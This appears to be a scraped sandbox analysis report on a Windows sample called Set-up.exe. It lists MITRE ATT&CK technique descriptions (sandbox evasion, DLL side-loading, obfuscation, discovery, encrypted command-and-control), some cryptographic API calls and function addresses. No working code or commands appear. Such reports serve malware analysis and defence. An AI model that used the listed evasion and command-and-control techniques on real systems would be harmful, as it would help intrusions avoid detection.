Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00898E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	0_2_00898E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009B8E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,	0_2_009B8E70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00526080 memset,BCryptGenRandom,	0_2_00526080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0074F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,	0_2_0074F6E0

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
Set-up.exe

Function 005129FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 0051255D Relevance: 49.3, APIs: 13, Strings: 15, Instructions: 282
filestringCOMMON

Function 005DAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 0051116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00898E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 005205B0 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 369
networkCOMMON

Function 009B8E70 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 005D9740 Relevance: 32.2, APIs: 12, Strings: 6, Instructions: 736
registrystringCOMMON

Function 00512F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Function 006EE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00548B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 005176A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69
networkCOMMON

Function 006947B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 005131D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Function 00517770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON